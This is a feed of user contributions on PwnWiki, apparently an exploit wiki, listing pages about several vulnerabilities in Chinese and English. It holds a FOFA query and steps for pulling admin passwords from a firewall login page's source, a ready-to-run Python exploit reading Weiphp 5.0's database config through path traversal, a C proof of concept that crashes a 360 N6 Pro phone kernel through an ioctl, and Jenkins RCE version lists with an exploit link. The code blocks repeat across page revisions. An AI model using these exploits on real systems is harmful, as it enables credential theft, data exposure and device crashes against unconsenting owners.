PwnWiki - User contributions [Chinese]

中科網威下一代防火牆控制系統賬號密碼洩露漏洞

2021-05-31T13:39:03Z

Wosk0x01: /* 漏洞利用 */

==FOFA==
<pre>
body="var dkey_verify = Get_Verify_Info(hex_md5)"
</pre>
⚠️️請注意：銳捷ISG、網域科技、中科網威等部分產品都存在該漏洞。
==漏洞利用==
查看網頁源代碼&解密MD5

可通過搜索 <nowiki><code>var dkey_verify = Get_Verify_Info(hex_md5(user_string).toLowerCase(), user_passwd/*"密碼"*/); </code></nowiki> 得到

密碼字段在user_passwd字段内，不同平臺/版本可能有差異，歡迎進行補充

CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/en

2021-05-31T03:57:54Z

Wosk0x01: Created page with "==Reference=="

<languages />

==Impact of the vulnerability==
<pre>
Weiphp <= 5.0
</pre>

==POC==
<pre>
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech

import requests
import random
import re

def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m') \033[0m')
print('+ \033[34mVersion: Weiphp5.0 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')

def POC_1(target_url):
upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
data = {
"1":1
}
try:
response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
if response.status_code == 200:
print("\033[32m[o] 成功将 database.php文件写入Pictrue表中\033[0m")
else:
print("\033[31m[x] 漏洞利用失败 \033[0m")
except:
print("\033[31m[x] 漏洞利用失败 \033[0m")

def POC_2(target_url):
vnln_url = target_url + "/public/index.php/home/file/user_pics"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
try:
response = requests.get(url=vnln_url, headers=headers).text
href = re.findall(r'<img src="(.*?)"', response)
for i in href:
print("\033[32m[o] 得到敏感文件url：{}\033[0m".format(i))
data = requests.get(url=i, headers=headers)
path = str(random.randint(1,999)) + '.php'
with open(path, 'wb') as f:
f.write(data.content)
print("\033[32m[o] 成功下载文件为：{}\033[0m".format(path))
print("\033[32m[o] 文件内容为：\n\033[0m{}".format(data.text))
except:
print("\033[31m[x] 获取文件名失败 \033[0m")

if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
image_url = POC_2(target_url)
</pre>
==Reference==
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html

Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/2/en

2021-05-31T03:57:46Z

Wosk0x01: Created page with "==Reference=="

==Reference==

Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/Page display title/en

2021-05-31T03:57:33Z

Wosk0x01: Created page with "CNVD-2020-68596 Weiphp5.0 foreground file arbitrary read vulnerability"

CNVD-2020-68596 Weiphp5.0 foreground file arbitrary read vulnerability

CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/en

2021-05-31T03:57:31Z

Wosk0x01: Created page with "==Impact of the vulnerability=="

<languages />

==Impact of the vulnerability==
<pre>
Weiphp <= 5.0
</pre>

==POC==
<pre>
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech

import requests
import random
import re

def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m') \033[0m')
print('+ \033[34mVersion: Weiphp5.0 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')

def POC_1(target_url):
upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
data = {
"1":1
}
try:
response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
if response.status_code == 200:
print("\033[32m[o] 成功将 database.php文件写入Pictrue表中\033[0m")
else:
print("\033[31m[x] 漏洞利用失败 \033[0m")
except:
print("\033[31m[x] 漏洞利用失败 \033[0m")

def POC_2(target_url):
vnln_url = target_url + "/public/index.php/home/file/user_pics"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
try:
response = requests.get(url=vnln_url, headers=headers).text
href = re.findall(r'<img src="(.*?)"', response)
for i in href:
print("\033[32m[o] 得到敏感文件url：{}\033[0m".format(i))
data = requests.get(url=i, headers=headers)
path = str(random.randint(1,999)) + '.php'
with open(path, 'wb') as f:
f.write(data.content)
print("\033[32m[o] 成功下载文件为：{}\033[0m".format(path))
print("\033[32m[o] 文件内容为：\n\033[0m{}".format(data.text))
except:
print("\033[31m[x] 获取文件名失败 \033[0m")

if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
image_url = POC_2(target_url)
</pre>
<div lang="chinese" dir="ltr" class="mw-content-ltr">
==參考==
</div>
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html

Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/1/en

2021-05-31T03:56:33Z

Wosk0x01: Created page with "==Impact of the vulnerability=="

==Impact of the vulnerability==

360 Phone N6 Pro內核漏洞/en

2021-05-31T03:38:46Z

Wosk0x01: Created page with "The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device <code>/dev/block/mmcblk0rpmb</cod..."

<languages />
==Principle of the vulnerability==

The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device <code>/dev/block/mmcblk0rpmb</code> and cause the kernel to crash.

==Impact of the vulnerability==

360 Phone N6 Pro 1801-A01

==POC==
<pre>
/*
* This is poc of 360 N6 Pro, 1801-A01
* Android Version: 7.1.1
* Version Number: V096
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/block/mmcblk0rpmb";
static command = 3235427072; // 0xc0d8b300

int main(int argc, char **argv, char **env) {
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %dn", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try ioctl device file '%s', with command 0x%x and payload NULLn", driver, command);
printf("System will crash and reboot.n");
if(ioctl(fd, command, NULL) < 0) {
printf("Allocation of structs failed, %dn", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
</pre>

Translations:360 Phone N6 Pro內核漏洞/3/en

2021-05-31T03:31:08Z

Wosk0x01: Created page with "==Impact of the vulnerability=="

==Impact of the vulnerability==

Translations:360 Phone N6 Pro內核漏洞/2/en

2021-05-31T03:30:37Z

The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device <code>/dev/block/mmcblk0rpmb</code> and cause the kernel to crash.

360 Phone N6 Pro內核漏洞/en

2021-05-31T03:22:45Z

Wosk0x01: Created page with "==Principle of the vulnerability=="

<languages />
==Principle of the vulnerability==

<div lang="chinese" dir="ltr" class="mw-content-ltr">
360 Phone N6 Pro V096內核組件中的內核模塊允許攻擊者使用命令3235427072在設備<code>/dev/block/mmcblk0rpmb</code>上通過ioctl的自變量注入精心設計的自變量，並導致內核崩潰。
</div>

<div lang="chinese" dir="ltr" class="mw-content-ltr">
==漏洞影響==
</div>

360 Phone N6 Pro 1801-A01

==POC==
<pre>
/*
* This is poc of 360 N6 Pro, 1801-A01
* Android Version: 7.1.1
* Version Number: V096
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/block/mmcblk0rpmb";
static command = 3235427072; // 0xc0d8b300

int main(int argc, char **argv, char **env) {
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %dn", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try ioctl device file '%s', with command 0x%x and payload NULLn", driver, command);
printf("System will crash and reboot.n");
if(ioctl(fd, command, NULL) < 0) {
printf("Allocation of structs failed, %dn", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
</pre>

Translations:360 Phone N6 Pro內核漏洞/1/en

2021-05-31T03:21:48Z

Wosk0x01: Created page with "==Principle of the vulnerability=="

==Principle of the vulnerability==

360 Phone N6 Pro內核漏洞/en

2021-05-31T03:21:35Z

Wosk0x01: Created page with "360 Phone N6 Pro Kernel Vulnerability"

<languages />
<div lang="chinese" dir="ltr" class="mw-content-ltr">
==漏洞原理==
</div>

<div lang="chinese" dir="ltr" class="mw-content-ltr">
360 Phone N6 Pro V096內核組件中的內核模塊允許攻擊者使用命令3235427072在設備<code>/dev/block/mmcblk0rpmb</code>上通過ioctl的自變量注入精心設計的自變量，並導致內核崩潰。
</div>

<div lang="chinese" dir="ltr" class="mw-content-ltr">
==漏洞影響==
</div>

360 Phone N6 Pro 1801-A01

==POC==
<pre>
/*
* This is poc of 360 N6 Pro, 1801-A01
* Android Version: 7.1.1
* Version Number: V096
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/block/mmcblk0rpmb";
static command = 3235427072; // 0xc0d8b300

int main(int argc, char **argv, char **env) {
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %dn", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}

printf("Try ioctl device file '%s', with command 0x%x and payload NULLn", driver, command);
printf("System will crash and reboot.n");
if(ioctl(fd, command, NULL) < 0) {
printf("Allocation of structs failed, %dn", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
</pre>

Translations:360 Phone N6 Pro內核漏洞/Page display title/en

2021-05-31T03:21:25Z

Wosk0x01: Created page with "360 Phone N6 Pro Kernel Vulnerability"

360 Phone N6 Pro Kernel Vulnerability

CVE-2019-1003005遠程代碼執行漏洞/zh-cn

2021-05-31T01:46:41Z

Wosk0x01: Created page with "==影响版本=="

<languages />
==影响版本==
<pre>
Jenkins 2.53
Jenkins 2.122
Jenkins 2.137
Jenkins 2.138 啟用匿名讀取
Jenkins 2.152 啟用匿名讀取
Jenkins 2.153 啟用匿名讀取
Script Security Plugin 1.43
Script Security Plugin 1.48
</pre>

==EXP==
https://github.com/orangetw/awesome-jenkins-rce-2019

Translations:CVE-2019-1003005遠程代碼執行漏洞/1/zh-cn

2021-05-31T01:46:18Z

Wosk0x01: Created page with "==影响版本=="

==影响版本==

CVE-2019-1003005遠程代碼執行漏洞/zh-cn

2021-05-31T01:46:16Z

Wosk0x01: Created page with "CVE-2019-1003005远程代码执行漏洞"

<languages />
<div lang="chinese" dir="ltr" class="mw-content-ltr">
==影響版本==
</div>
<pre>
Jenkins 2.53
Jenkins 2.122
Jenkins 2.137
Jenkins 2.138 啟用匿名讀取
Jenkins 2.152 啟用匿名讀取
Jenkins 2.153 啟用匿名讀取
Script Security Plugin 1.43
Script Security Plugin 1.48
</pre>

==EXP==
https://github.com/orangetw/awesome-jenkins-rce-2019

Translations:CVE-2019-1003005遠程代碼執行漏洞/Page display title/zh-cn

2021-05-31T01:46:01Z

Wosk0x01: Created page with "CVE-2019-1003005远程代码执行漏洞"

CVE-2019-1003005远程代码执行漏洞

PwnWiki - User contributions [Chinese]

中科網威下一代防火牆控制系統 賬號密碼洩露漏洞

CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/en

Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/2/en

Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/Page display title/en

CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/en

Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/1/en

360 Phone N6 Pro內核漏洞/en

Translations:360 Phone N6 Pro內核漏洞/3/en

Translations:360 Phone N6 Pro內核漏洞/2/en

360 Phone N6 Pro內核漏洞/en

Translations:360 Phone N6 Pro內核漏洞/1/en

360 Phone N6 Pro內核漏洞/en

Translations:360 Phone N6 Pro內核漏洞/Page display title/en

CVE-2019-1003005遠程代碼執行漏洞/zh-cn

Translations:CVE-2019-1003005遠程代碼執行漏洞/1/zh-cn

CVE-2019-1003005遠程代碼執行漏洞/zh-cn

Translations:CVE-2019-1003005遠程代碼執行漏洞/Page display title/zh-cn

中科網威下一代防火牆控制系統賬號密碼洩露漏洞